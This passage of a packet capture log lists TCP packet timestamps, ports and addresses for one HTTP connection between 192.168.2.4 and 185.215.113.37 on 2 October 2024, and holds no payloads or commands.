Oct 2, 2024 18:19:26.782371044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782378912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782397985 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782437086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782444954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782510042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782599926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782614946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782629967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782644987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782654047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782659054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782675028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782682896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782690048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782700062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782706022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782721996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782727957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782737017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782752991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782757998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782773972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782866955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.783052921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783066988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783082008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783097029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783111095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783112049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.783126116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783143997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.783165932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.783365011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783404112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783411026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.783418894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783433914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783447027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783451080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.783463001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783469915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.783479929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783493996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783499002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.783508062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783519983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.783550024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.783623934 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783642054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783658028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.783677101 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.783701897 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.822654963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.822706938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.822722912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.822736979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.822747946 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.822753906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.822767973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.822771072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.822783947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.822798014 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.822813034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.822845936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.822860003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.822874069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.822885990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.822912931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.822963953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.822978973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.822993994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823008060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823010921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.823021889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823036909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823039055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.823470116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.823470116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.823699951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823714972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823729038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823743105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823754072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.823756933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823780060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823787928 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.823795080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823802948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.823808908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823824883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823829889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.823839903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823854923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.823856115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823869944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823873997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.823885918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.823901892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.823936939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.824577093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.824593067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.824606895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.824621916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.824625015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.824636936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.824649096 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.824651003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.824666977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.824681044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.824687958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.824700117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.824706078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.824721098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.825026035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.874321938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874339104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874353886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874416113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874430895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874445915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874445915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.874461889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874485016 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.874499083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.874567032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874582052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874597073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874619007 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.874639988 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.874656916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874672890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874686956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874701977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874703884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.874716997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874720097 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.874732018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874747992 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.874773979 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.874943018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.874986887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875063896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875078917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875093937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875108004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875113010 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875123024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875123978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875138998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875145912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875154018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875199080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875345945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875368118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875374079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875391006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875401974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875433922 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875436068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875449896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875461102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875463963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875479937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875484943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875498056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875498056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875528097 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875549078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875710011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875725031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875739098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875752926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875754118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875766993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875767946 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875782013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875783920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875796080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875808001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875811100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875825882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.875842094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.875864983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876041889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876055956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876070023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876095057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876106977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876204014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876225948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876240015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876252890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876255035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876269102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876274109 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876288891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876291990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876303911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876316071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876318932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876332998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876344919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876348972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876364946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876374006 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876379013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876390934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876393080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876408100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876419067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876421928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876444101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876447916 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876463890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876487970 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.876974106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.876988888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.877002954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.877017975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.877032042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.877032995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.877046108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.877055883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.877058983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.877073050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.877084970 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.877106905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.879831076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.879846096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.879862070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.879888058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.879901886 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.879945040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.879960060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.879973888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.879988909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.879992008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.880014896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.880048037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.880074978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.880089045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.916173935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916229010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916244030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916316986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916332006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916346073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916361094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916385889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916399956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916400909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.916414022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916429043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916443110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916448116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.916460991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916470051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.916475058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916486979 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.916488886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916503906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.916516066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.916539907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.917094946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917109966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917124987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917136908 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.917140007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917171955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.917193890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.917241096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917256117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917270899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917279959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.917284966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917299986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917301893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.917315960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917320013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.917339087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.917337894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917352915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917363882 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.917368889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917383909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917397976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917398930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.917412996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917423964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.917429924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917444944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.917457104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.917486906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.966681004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.966759920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.966772079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.966787100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.966810942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.966810942 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.966826916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.966830969 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.966846943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.966861010 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.966928959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.966947079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.966964006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.966969967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.966988087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967001915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967101097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967114925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967129946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967138052 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967144012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967154026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967159033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967169046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967174053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967185020 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967189074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967200994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967206001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967216969 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967231035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967247963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967453003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967467070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967490911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967493057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967504978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967511892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967519999 CEST	80	49737	185.215.113.37	192.168.2.4
